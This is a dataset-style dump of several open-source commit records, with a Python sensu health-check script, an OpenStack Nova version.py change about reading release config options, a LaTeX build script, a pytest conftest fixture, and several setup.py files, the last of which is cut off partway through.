    # Query the consumer-group health endpoint on `host` and exit with
    # the sensu code matching the reported status (0 ok / 1 warn / 2 fail).
    try:
        con = httplib.HTTPConnection(host,timeout=45)
        con.request("GET","/v1/health/betty/" + group)
        data = con.getresponse()
        if data.status >= 300:
            print "Recieved non-2xx response= %s in get_status" % (data.status)
            sys.exit(FAIL)
        json_data = json.loads(data.read())
        con.close()
        # Map the service's numeric status onto sensu exit codes.
        if json_data['status'] == 2:
            print "%s" % (json_data['msg'])
            sys.exit(FAIL)
        elif json_data['status'] == 1:
            print "%s" % (json_data['msg'])
            sys.exit(WARNING)
        else:
            print " `%s` is fine" %group
            sys.exit(PASS)
    except Exception, e:
        # sys.exit raises SystemExit (BaseException), so the deliberate
        # exits above are not swallowed by this handler.
        print "%s Exception caught in get_status" % (e)
        sys.exit(FAIL)
if __name__=="__main__":
parser = OptionParser()
parser.add_option("-s", dest="server", action="store", default="localhost:8080", help="Marathon Cluster address with port no")
parser.add_option("-a", dest="app", action="store", default="bongo.useast.prod", help="App Id to retrieve the slave address")
parser.add_option("-c", dest="group", action="store", default="betty.useast.prod", help="Name of betty Consumer Group")
(options, args) = parser.parse_args()
host, port = get_bongo_host(options.server, options.app)
if "useast" in host:
host = host.rsplit("prd",1)
consul_host = "%snode.us-east-1.consul:%s" % (host[0], port)
else:
consul_host = "%s:%s" % (host, port)
get_status(consul_host, options.group)
| mit | Python | |
ce68b7f025d1ee25a58a093adf462b4b77fb0ad4 | remove duplicate calls to cfg.get() | bgxavier/nova,klmitch/nova,whitepages/nova,joker946/nova,whitepages/nova,rajalokan/nova,zaina/nova,eonpatapon/nova,scripnichenko/nova,vmturbo/nova,double12gzh/nova,raildo/nova,edulramirez/nova,klmitch/nova,rahulunair/nova,adelina-t/nova,NeCTAR-RC/nova,Juniper/nova,MountainWei/nova,hanlind/nova,mikalstill/nova,iuliat/nova,vmturbo/nova,cloudbase/nova,jeffrey4l/nova,dawnpower/nova,rajalokan/nova,alexandrucoman/vbox-nova-driver,devendermishrajio/nova,hanlind/nova,JioCloud/nova,akash1808/nova,Juniper/nova,Stavitsky/nova,j-carpentier/nova,Francis-Liu/animated-broccoli,edulramirez/nova,mmnelemane/nova,mandeepdhami/nova,CloudServer/nova,cloudbase/nova,cernops/nova,rajalokan/nova,ruslanloman/nova,CCI-MOC/nova,petrutlucian94/nova,iuliat/nova,watonyweng/nova,akash1808/nova_test_latest,CloudServer/nova,Tehsmash/nova,cloudbase/nova,BeyondTheClouds/nova,akash1808/nova,rahulunair/nova,tangfeixiong/nova,takeshineshiro/nova,apporc/nova,sebrandon1/nova,isyippee/nova,phenoxim/nova,JioCloud/nova_test_latest,jianghuaw/nova,gooddata/openstack-nova,thomasem/nova,CCI-MOC/nova,fnordahl/nova,fnordahl/nova,vmturbo/nova,barnsnake351/nova,dims/nova,cyx1231st/nova,Francis-Liu/animated-broccoli,rahulunair/nova,NeCTAR-RC/nova,JioCloud/nova,varunarya10/nova_test_latest,mahak/nova,gooddata/openstack-nova,kimjaejoong/nova,sebrandon1/nova,jianghuaw/nova,mandeepdhami/nova,bigswitch/nova,tealover/nova,eonpatapon/nova,Tehsmash/nova,tealover/nova,varunarya10/nova_test_latest,alaski/nova,openstack/nova,nikesh-mahalka/nova,vmturbo/nova,yatinkumbhare/openstack-nova,zhimin711/nova,jianghuaw/nova,rajalokan/nova,joker946/nova,raildo/nova,double12gzh/nova,dawnpower/nova,Stavitsky/nova,adelina-t/nova,mahak/nova,Juniper/nova,blueboxgroup/nova,gooddata/openstack-nova,jianghuaw/nova,openstack/nova,phenoxim/nova,kimjaejoong/nova,tudorvio/nova,alvarolopez/nova,petrutlucian94/nova,isyippee/nova,ted-gould/nova,thomasem/nova,watonyweng/nova,
mikalstill/nova,CEG-FYP-OpenStack/scheduler,cyx1231st/nova,sebrandon1/nova,hanlind/nova,devendermishrajio/nova_test_latest,JioCloud/nova_test_latest,alvarolopez/nova,TwinkleChawla/nova,barnsnake351/nova,JianyuWang/nova,j-carpentier/nova,jeffrey4l/nova,JianyuWang/nova,zzicewind/nova,alaski/nova,devendermishrajio/nova_test_latest,tudorvio/nova,noironetworks/nova,mmnelemane/nova,BeyondTheClouds/nova,klmitch/nova,bigswitch/nova,yosshy/nova,shail2810/nova,dims/nova,klmitch/nova,ruslanloman/nova,scripnichenko/nova,gooddata/openstack-nova,bgxavier/nova,zaina/nova,blueboxgroup/nova,felixma/nova,CEG-FYP-OpenStack/scheduler,zhimin711/nova,shail2810/nova,alexandrucoman/vbox-nova-driver,yosshy/nova,zzicewind/nova,noironetworks/nova,BeyondTheClouds/nova,LoHChina/nova,cernops/nova,tangfeixiong/nova,takeshineshiro/nova,LoHChina/nova,MountainWei/nova,belmiromoreira/nova,belmiromoreira/nova,ted-gould/nova,mikalstill/nova,cernops/nova,mahak/nova,apporc/nova,TwinkleChawla/nova,felixma/nova,devendermishrajio/nova,openstack/nova,yatinkumbhare/openstack-nova,nikesh-mahalka/nova,akash1808/nova_test_latest,Juniper/nova | nova/version.py | nova/version.py | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pbr.version
from nova.i18n import _LE
NOVA_VENDOR = "OpenStack Foundation"
NOVA_PRODUCT = "OpenStack Nova"
NOVA_PACKAGE = None # OS distro package version suffix
loaded = False
version_info = pbr.version.VersionInfo('nova')
version_string = version_info.version_string
def _load_config():
    """Populate NOVA_VENDOR/PRODUCT/PACKAGE from an optional 'release' file.

    Runs at most once (guarded by the module-level `loaded` flag); absent
    file or options leave the built-in defaults untouched.
    """
    # Don't load in global context, since we can't assume
    # these modules are accessible when distutils uses
    # this module
    import ConfigParser
    from oslo.config import cfg
    from nova.openstack.common import log as logging
    global loaded, NOVA_VENDOR, NOVA_PRODUCT, NOVA_PACKAGE
    if loaded:
        return
    loaded = True
    cfgfile = cfg.CONF.find_file("release")
    if cfgfile is None:
        # No release file installed; keep the defaults.
        return
    try:
        # Local name deliberately shadows the oslo `cfg` module from here on.
        cfg = ConfigParser.RawConfigParser()
        cfg.read(cfgfile)
        # Only read options that are actually present.
        if cfg.has_option("Nova", "vendor"):
            NOVA_VENDOR = cfg.get("Nova", "vendor")
        if cfg.has_option("Nova", "product"):
            NOVA_PRODUCT = cfg.get("Nova", "product")
        if cfg.has_option("Nova", "package"):
            NOVA_PACKAGE = cfg.get("Nova", "package")
    except Exception as ex:
        LOG = logging.getLogger(__name__)
        LOG.error(_LE("Failed to load %(cfgfile)s: %(ex)s"),
                  {'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
    """Return the vendor name, after loading any 'release' overrides."""
    _load_config()
    return NOVA_VENDOR
def product_string():
    """Return the product name, after loading any 'release' overrides."""
    _load_config()
    return NOVA_PRODUCT
def package_string():
    """Return the distro package suffix (or None) after loading overrides."""
    _load_config()
    return NOVA_PACKAGE
def version_string_with_package():
    """Return the version string, suffixed with any distro package version."""
    base = version_info.version_string()
    suffix = package_string()
    if suffix is None:
        return base
    return "%s-%s" % (base, suffix)
| # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pbr.version
from nova.i18n import _LE
NOVA_VENDOR = "OpenStack Foundation"
NOVA_PRODUCT = "OpenStack Nova"
NOVA_PACKAGE = None # OS distro package version suffix
loaded = False
version_info = pbr.version.VersionInfo('nova')
version_string = version_info.version_string
def _load_config():
    """Populate NOVA_VENDOR/PRODUCT/PACKAGE from an optional 'release' file.

    Runs at most once (guarded by the module-level `loaded` flag); an
    absent file or absent options leave the built-in defaults untouched.
    """
    # Don't load in global context, since we can't assume
    # these modules are accessible when distutils uses
    # this module
    import ConfigParser
    from oslo.config import cfg
    from nova.openstack.common import log as logging
    global loaded, NOVA_VENDOR, NOVA_PRODUCT, NOVA_PACKAGE
    if loaded:
        return
    loaded = True
    cfgfile = cfg.CONF.find_file("release")
    if cfgfile is None:
        # No release file installed; keep the defaults.
        return
    try:
        # Local name deliberately shadows the oslo `cfg` module from here on.
        cfg = ConfigParser.RawConfigParser()
        cfg.read(cfgfile)
        # Only read options that are present: an unconditional cfg.get()
        # raises NoOptionError for a missing option, which aborted the
        # whole load (via the broad except below) and discarded the
        # remaining overrides, making the has_option guards dead code.
        if cfg.has_option("Nova", "vendor"):
            NOVA_VENDOR = cfg.get("Nova", "vendor")
        if cfg.has_option("Nova", "product"):
            NOVA_PRODUCT = cfg.get("Nova", "product")
        if cfg.has_option("Nova", "package"):
            NOVA_PACKAGE = cfg.get("Nova", "package")
    except Exception as ex:
        LOG = logging.getLogger(__name__)
        LOG.error(_LE("Failed to load %(cfgfile)s: %(ex)s"),
                  {'cfgfile': cfgfile, 'ex': ex})
def vendor_string():
    """Return the vendor name, after loading any 'release' overrides."""
    _load_config()
    return NOVA_VENDOR
def product_string():
    """Return the product name, after loading any 'release' overrides."""
    _load_config()
    return NOVA_PRODUCT
def package_string():
    """Return the distro package suffix (or None) after loading overrides."""
    _load_config()
    return NOVA_PACKAGE
def version_string_with_package():
    """Return the version string, suffixed with any distro package version."""
    if package_string() is None:
        return version_info.version_string()
    else:
        return "%s-%s" % (version_info.version_string(), package_string())
| apache-2.0 | Python |
02de60c0157aaa52d8f31fe623902a32c734d248 | add generic A&A make script | adamginsburg/APEX_CMZ_H2CO,keflavich/APEX_CMZ_H2CO,adamginsburg/APEX_CMZ_H2CO,keflavich/APEX_CMZ_H2CO | tex/make.py | tex/make.py | #!/bin/env python
import subprocess
import shutil
import glob
import argparse
import os
# Base name of the LaTeX project; drives default input/output file names.
name = 'apex_cmz_h2co'
parser = argparse.ArgumentParser(description='Make latex files.')
parser.add_argument('--referee', default=False,
                    action='store_true', help='referee style?')
parser.add_argument('--texpath', default='/usr/texbin/',
                    help='path to pdflatex')
parser.add_argument('--infile', default=name+'.tex')
parser.add_argument('--outfile', default='auto')
parser.add_argument('--noclean', default=True, action='store_false')
parser.add_argument('--both', default=False, action='store_true')
args = parser.parse_args()
def do_everything():
    """Run the full pdflatex/bibtex cycle and produce a gs-compressed PDF."""
    # NOTE(review): --noclean is store_false with default=True, so passing
    # --noclean makes this branch run, i.e. the flag ENABLES cleaning --
    # the flag name looks inverted; confirm intent before relying on it.
    if not args.noclean:
        for globstr in (name+"*.aux", name+"*.bbl", name+"*.blg",
                        name+"*.dvi", name+"*.log", name+"*.lot",
                        name+"*.lof"):
            for fn in glob.glob(globstr):
                os.remove(fn)
    PDFLATEX=os.path.join(args.texpath,'pdflatex')
    pdflatex_args = "-halt-on-error -synctex=1 --interaction=nonstopmode".split()
    BIBTEX = os.path.join(args.texpath, 'bibtex')
    # Regenerate preface_aa.tex: the A&A documentclass line (with the
    # referee option when requested) followed by the shared preface.
    with open('preface.tex','r') as f:
        preface = f.read()
    with open('preface_aa.tex','w') as aa:
        if args.referee:
            aa.write('\documentclass[referee]{aa}\n')
            aa.write(preface)
        else:
            aa.write('\documentclass{aa}\n')
            aa.write(preface)
    # Standard latex/bibtex dance to resolve citations and references.
    pdfcmd = [PDFLATEX] + pdflatex_args + [args.infile]
    bibcmd = [BIBTEX, args.infile.replace(".tex","")]
    subprocess.call(pdfcmd)
    subprocess.call(bibcmd)
    subprocess.call(pdfcmd)
    subprocess.call(bibcmd)
    subprocess.call(pdfcmd)
    if args.outfile == 'auto':
        outprefix = name+'_referee' if args.referee else name
    else:
        outprefix = os.path.splitext(args.outfile)[0]
    # Don't move unnecessarily; messes with Skim.app (maybe?)
    # NOTE(review): os.path.split(os.path.basename(...))[0] is always '',
    # so this condition is always true -- was os.path.splitext intended?
    if os.path.split(os.path.basename(outprefix))[0] != name:
        shutil.move(name+".pdf",outprefix+".pdf")
    # Ghostscript pass to shrink the final PDF.
    gscmd = ["gs",
             "-dSAFER",
             "-dBATCH",
             "-dNOPAUSE",
             "-sDEVICE=pdfwrite",
             "-sOutputFile={0}_compressed.pdf".format(outprefix),
             "{0}.pdf".format(outprefix)]
    subprocess.call(gscmd)
# With --both, build the referee and non-referee versions in one run by
# mutating args.referee between calls.
if args.both:
    args.referee = True
    do_everything()
    args.referee = False
    do_everything()
else:
    do_everything()
| bsd-3-clause | Python | |
c1fb3eb548b15ab8049841696b7ae74604c8ed89 | Test for pytest.ini as session-scoped fixture | opentechinstitute/commotion-router-test-suite | tests/conftest.py | tests/conftest.py | """
Config instructions and test fixtures
"""
import pytest
import os
import sys
# # these are just some fun dividiers to make the output pretty
# # completely unnecessary, I was just playing with autouse fixtures
# @pytest.fixture(scope="function", autouse=True)
# def divider_function(request):
# print('\n --- function %s() start ---' % request.function.__name__)
# def fin():
# print(' --- function %s() done ---' % request.function.__name__)
# request.addfinalizer(fin)
@pytest.fixture(scope="session", autouse=True)
def set_up_ini(request):
print("in set_up_ini")
try:
# need to back up a directory
path = os.path.dirname(os.path.abspath("conftest.py"))
print(path)
if not os.path.isfile(path + "/pytest.ini"):
raise FileNotFoundError("Pytest.ini not found.")
except FileNotFoundError as args:
print(args)
try:
import shutil
print("Creating pytest.ini")
shutil.copyfile(path + "/example-pytest.ini", path + "/pytest.ini")
except OSError as args:
print("Error creating pytest.ini. ", args)
else:
print("Don't forget to add node admin credentials to pytest.ini!")
| agpl-3.0 | Python | |
5da51f9ac93487d144f53de30fed69484b9b64dd | add setup script | janbrohl/XMLCompare | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
import xmlcompare
setup(name="XMLCompare",
version=xmlcompare.__version__,
description="XMLCompare checks XML documents/elements for semantic equality",
author="Jan Brohl",
author_email="janbrohl@t-online.de",
url="https://github.com/janbrohl/xmlcompare",
py_modules=[
'xmlcompare'
],
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
]
)
| bsd-3-clause | Python | |
ab22712aa4dc628e257b592c56319871b6ed8f18 | Add setup.py file. | danriti/python-traceview | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
import traceview
packages = []
requires = []
setup(
name="python-traceview",
version=traceview.__version__,
description="TraceView API Client",
#long_description=long_description,
# The project URL.
url='https://github.com/danriti/python-traceview',
# Author details
author='Daniel Riti',
author_email='dmriti@gmail.com',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='traceview api client development performance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages.
packages=packages,
# List run-time dependencies here. These will be installed by pip when your
# project is installed.
install_requires=requires,
)
| mit | Python | |
43bdadcad33751b2ddbdac332106127a938f3492 | Add setuptools-based setup.py file | lvh/txampext | setup.py | setup.py | #!/usr/bin/env python
from setuptools import find_packages, setup
setup(name='txampext',
version='20121226',
description="Extensions to Twisted's AMP implementation",
url='https://github.com/lvh/txampext',
author='Laurens Van Houtven',
author_email='_@lvh.cc',
packages=find_packages(),
install_requires=['twisted'],
license='ISC',
classifiers=[
"Development Status :: 3 - Alpha",
"Framework :: Twisted",
"License :: OSI Approved :: ISC License (ISCL)",
])
| isc | Python | |
4a42116d0858089dbf2ac2fd8efdcb5ef9226b90 | bump version to 1.0.2 | Filechaser/sickbeard_mp4_automator,phtagn/sickbeard_mp4_automator,Collisionc/sickbeard_mp4_automator,Collisionc/sickbeard_mp4_automator,Filechaser/sickbeard_mp4_automator,phtagn/sickbeard_mp4_automator | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup, Command
from unittest import TextTestRunner, TestLoader
import os
import os.path
class TestCommand(Command):
    """distutils command: run the test suite via `python -m test`."""
    user_options = []
    def initialize_options(self):
        # Tests live in the 'test' directory next to the current dir.
        self._testdir = os.path.join(os.getcwd(), 'test')
    def finalize_options(self):
        pass
    def run(self):
        os.chdir(self._testdir)
        retval = os.system('python -m test')
        if retval != 0:
            raise Exception('tests failed')
class DocCommand(Command):
    """distutils command: build the HTML docs via `make html` in doc/."""
    user_options = []
    def initialize_options(self):
        self._docdir = os.path.join(os.getcwd(), 'doc')
    def finalize_options(self):
        pass
    def run(self):
        os.chdir(self._docdir)
        # Unlike TestCommand.run, the exit status is not checked here.
        os.system('make html')
setup(
name = 'VideoConverter',
version = '1.0.2',
description = 'Video Converter library',
url = 'http://senko.net/en/',
author = 'Senko Rasic',
author_email = 'senko.rasic@dobarkod.hr',
cmdclass = {
'test': TestCommand,
'doc': DocCommand
},
packages = [ 'converter' ],
)
| #!/usr/bin/env python
from distutils.core import setup, Command
from unittest import TextTestRunner, TestLoader
import os
import os.path
class TestCommand(Command):
user_options = []
def initialize_options(self):
self._testdir = os.path.join(os.getcwd(), 'test')
def finalize_options(self):
pass
def run(self):
os.chdir(self._testdir)
retval = os.system('python -m test')
if retval != 0:
raise Exception('tests failed')
class DocCommand(Command):
user_options = []
def initialize_options(self):
self._docdir = os.path.join(os.getcwd(), 'doc')
def finalize_options(self):
pass
def run(self):
os.chdir(self._docdir)
os.system('make html')
setup(
name = 'VideoConverter',
version = '1.0.1',
description = 'Video Converter library',
url = 'http://senko.net/en/',
author = 'Senko Rasic',
author_email = 'senko.rasic@dobarkod.hr',
cmdclass = {
'test': TestCommand,
'doc': DocCommand
},
packages = [ 'converter' ],
)
| mit | Python |
33427521617e45e3227ff7320362c14a6588ea5b | Remove extensions. | materialsproject/custodian,specter119/custodian,davidwaroquiers/custodian,materialsproject/custodian,xhqu1981/custodian,alberthxf/custodian,specter119/custodian,materialsproject/custodian,specter119/custodian | setup.py | setup.py | import os
from distribute_setup import use_setuptools
use_setuptools(version='0.6.10')
from setuptools import setup, find_packages
with open("README.rst") as f:
long_desc = f.read()
setup(
name="custodian",
packages=find_packages(),
version="0.1.0a",
install_requires=[],
extras_require={"vasp": ["pymatgen>=2.4.3"]},
package_data={},
author="Shyue Ping Ong",
author_email="shyuep@gmail.com",
maintainer="Shyue Ping Ong",
url="https://github.com/materialsproject/custodian",
license="MIT",
description="A simple JIT job management framework in Python.",
long_description=long_desc,
keywords=["jit", "just-in-time", "job", "management", "vasp"],
classifiers=[
"Programming Language :: Python :: 2.7",
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules"
],
download_url="https://github.com/materialsproject/custodian/archive/master.zip",
scripts=[os.path.join("scripts", f) for f in os.listdir("scripts")]
)
| import os
from distribute_setup import use_setuptools
use_setuptools(version='0.6.10')
from setuptools import setup, find_packages, Extension
with open("README.rst") as f:
long_desc = f.read()
setup(
name="custodian",
packages=find_packages(),
version="0.1.0a",
install_requires=[],
extras_require={"vasp": ["pymatgen>=2.4.3"]},
package_data={},
author="Shyue Ping Ong",
author_email="shyuep@gmail.com",
maintainer="Shyue Ping Ong",
url="https://github.com/materialsproject/custodian",
license="MIT",
description="A simple JIT job management framework in Python.",
long_description=long_desc,
keywords=["jit", "just-in-time", "job", "management", "vasp"],
classifiers=[
"Programming Language :: Python :: 2.7",
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Physics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules"
],
download_url="https://github.com/materialsproject/custodian/archive/master.zip",
scripts=[os.path.join("scripts", f) for f in os.listdir("scripts")]
)
| mit | Python |
048f643921fd291b262cac80fbc68531805419cf | Create setup.py | Flexin1981/AdxSuds | setup.py | setup.py | from distutils.core import setup
setup(
name='AdxSuds',
version='1.0',
packages=[''],
url='https://github.com/Flexin1981/AdxSuds',
license='',
author='John Dowling',
author_email='johndowling01@live.co.uk',
description='Brocade Adx Suds Module for the XML Api'
)
| mit | Python | |
7ec768f50d5d0e8537fac23a2b819965374ce582 | Use version of zope.interface we have available. | wallnerryan/flocker-profiles,jml/flocker,runcom/flocker,beni55/flocker,mbrukman/flocker,wallnerryan/flocker-profiles,1d4Nf6/flocker,moypray/flocker,mbrukman/flocker,hackday-profilers/flocker,beni55/flocker,adamtheturtle/flocker,jml/flocker,lukemarsden/flocker,moypray/flocker,mbrukman/flocker,achanda/flocker,Azulinho/flocker,agonzalezro/flocker,runcom/flocker,w4ngyi/flocker,hackday-profilers/flocker,beni55/flocker,AndyHuu/flocker,achanda/flocker,AndyHuu/flocker,1d4Nf6/flocker,adamtheturtle/flocker,w4ngyi/flocker,runcom/flocker,Azulinho/flocker,AndyHuu/flocker,LaynePeng/flocker,jml/flocker,agonzalezro/flocker,adamtheturtle/flocker,wallnerryan/flocker-profiles,hackday-profilers/flocker,LaynePeng/flocker,LaynePeng/flocker,w4ngyi/flocker,moypray/flocker,1d4Nf6/flocker,agonzalezro/flocker,achanda/flocker,lukemarsden/flocker,lukemarsden/flocker,Azulinho/flocker | setup.py | setup.py | # Copyright Hybrid Logic Ltd. See LICENSE file for details.
#
# Generate a Flocker package that can be deployed onto cluster nodes.
#
import os.path
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), b"flocker/version")
with open(path) as fObj:
version = fObj.read().strip()
del path
setup(
# This is the human-targetted name of the software being packaged.
name="Flocker",
# This is a string giving the version of the software being packaged. For
# simplicity it should be something boring like X.Y.Z.
version=version,
# This identifies the creators of this software. This is left symbolic for
# ease of maintenance.
author="HybridCluster Team",
# This is contact information for the authors.
author_email="support@hybridcluster.com",
# Here is a website where more information about the software is available.
url="http://hybridcluster.com/",
# This defines *Python* packages (in other words, things that can be
# imported) which are part of the package. Most of what they contain will
# be included in the package automatically by virtue of the packages being
# mentioned here. These aren't recursive so each sub-package must also be
# explicitly included.
packages=[
"flocker", "flocker.test",
],
# This defines extra non-source files that live in the source tree that
# need to be included as part of the package.
package_data={
# This is the canonical definition of the source form of the cluster
# version.
"flocker": ["version"],
},
install_requires=[
"machinist == 0.1",
"zope.interface == 4.0.5",
# Pinning this isn't great in general, but we're only using UTC so meh:
"pytz == 2014.2",
"Twisted == 13.2.0"
],
extras_require={
# This extra allows you to build the documentation for Flocker.
"doc": ["Sphinx==1.2", "sphinx-rtd-theme==0.1.6"],
# This extra is for developers who need to work on Flocker itself.
"dev": ["pyflakes==0.8.1"]
},
)
| # Copyright Hybrid Logic Ltd. See LICENSE file for details.
#
# Generate a Flocker package that can be deployed onto cluster nodes.
#
import os.path
from setuptools import setup
path = os.path.join(os.path.dirname(__file__), b"flocker/version")
with open(path) as fObj:
version = fObj.read().strip()
del path
setup(
# This is the human-targetted name of the software being packaged.
name="Flocker",
# This is a string giving the version of the software being packaged. For
# simplicity it should be something boring like X.Y.Z.
version=version,
# This identifies the creators of this software. This is left symbolic for
# ease of maintenance.
author="HybridCluster Team",
# This is contact information for the authors.
author_email="support@hybridcluster.com",
# Here is a website where more information about the software is available.
url="http://hybridcluster.com/",
# This defines *Python* packages (in other words, things that can be
# imported) which are part of the package. Most of what they contain will
# be included in the package automatically by virtue of the packages being
# mentioned here. These aren't recursive so each sub-package must also be
# explicitly included.
packages=[
"flocker", "flocker.test",
],
# This defines extra non-source files that live in the source tree that
# need to be included as part of the package.
package_data={
# This is the canonical definition of the source form of the cluster
# version.
"flocker": ["version"],
},
install_requires=[
"machinist == 0.1",
"zope.interface == 4.1.1",
# Pinning this isn't great in general, but we're only using UTC so meh:
"pytz == 2014.2",
"Twisted == 13.2.0"
],
extras_require={
# This extra allows you to build the documentation for Flocker.
"doc": ["Sphinx==1.2", "sphinx-rtd-theme==0.1.6"],
# This extra is for developers who need to work on Flocker itself.
"dev": ["pyflakes==0.8.1"]
},
)
| apache-2.0 | Python |
e5175894d49afe8205f0f969ffc4ea9eecec0f72 | add setup.py file | jephdo/pynvd3 | setup.py | setup.py | from distutils.core import setup
setup(
name='pynvd3',
version='0.01',
description='A Python wrapper for NVD3.js',
url='http://github.com/jephdo/pynvd3/',
author='Jeph Do',
author_email='jephdo@gmail.com',
packages=[
'pynvd3',
],
classifiers=[
'Development Status :: 1 - Planning',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
]
)
| mit | Python | |
d38554332872c1b8f4a3a44bf4c18dda68752d04 | add setup.py file | pavlov99/json-rpc | setup.py | setup.py | import os
from setuptools import setup, find_packages
from pmll import version
# Import multiprocessing to prevent test run problem. In case of nosetests
# (not nose2) there is probles, for details see:
# https://groups.google.com/forum/#!msg/nose-users/fnJ-kAUbYHQ/_UsLN786ygcJ
# http://bugs.python.org/issue15881#msg170215w
try:
import multiprocessing
except ImportError:
pass
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except IOError:
return ""
install_requires = read("requirements.txt").split()
setup(
name="json-rpc",
version=version,
packages=find_packages(),
# test_suite="nose2.collector.collector",
test_suite="nose.collector",
tests_require=["nose"],
# metadata for upload to PyPI
author="Kirill Pavlov",
author_email="kirill.pavlov@phystech.edu",
url="https://github.com/pavlov99/json-rpc",
description="JSON-RPC transport realisation",
# Full list:
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Topic :: Software Development :: Libraries",
],
license="MIT",
)
| mit | Python | |
340baa5f077b0ae3cb1ab6de736d67be89319c35 | Create setup.py | theskumar/python-usernames | setup.py | setup.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup
setup(
name="python-usernames",
description="Python library to validate usernames suitable for use in public facing applications.",
version="0.0.1",
author="Saurabh Kumar",
author_email="me+github@saurabh-kumar.com",
url="http://github.com/theskumar/python-usernames",
keywords=['username', 'validation', 'registration', 'python'],
py_modules=['usernames'],
install_requires=[
'click>=5.0',
],
entry_points='''
[console_scripts]
validate_username=usernames:cli
''',
classifiers=[
# As from https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
# 'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.3',
# 'Programming Language :: Python :: 2.4',
# 'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.0',
# 'Programming Language :: Python :: 3.1',
# 'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
# 'Programming Language :: Python :: 3.4',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# 'Topic :: System :: Systems Administration',
'Topic :: Utilities',
# 'Environment :: Web Environment',
# 'Framework :: Django',
]
)
# (*) Please direct queries to the discussion group, rather than to me directly
# Doing so helps ensure your question is helpful to other users.
# Queries directly to my email are likely to receive a canned response.
#
# Many thanks for your understanding.
| mit | Python | |
c3b44b012ddc18f7a6711609f04060f65bd36846 | include history with readme for setup.py | jimyx17/gmusic,peetahzee/Unofficial-Google-Music-API,nvbn/Unofficial-Google-Music-API,tanhaiwang/gmusicapi,TheOpenDevProject/gmusicapi,simon-weber/Unofficial-Google-Music-API,dvirtz/gmusicapi,thebigmunch/gmusicapi,dvirtz/gmusicapi,simon-weber/gmusicapi | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
from setuptools import find_packages
import re
#This hack is from http://stackoverflow.com/a/7071358/1231454;
# the version is kept in a seperate file and gets parsed - this
# way, setup.py doesn't have to import the package.
VERSIONFILE = 'gmusicapi/version.py'
version_line = open(VERSIONFILE).read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(version_re, version_line, re.M)
if match:
version = match.group(1)
else:
raise RuntimeError("Could not find version in '%s'" % VERSIONFILE)
setup(
name='gmusicapi',
version=version,
author='Simon Weber',
author_email='simon@simonmweber.com',
url='http://pypi.python.org/pypi/gmusicapi/',
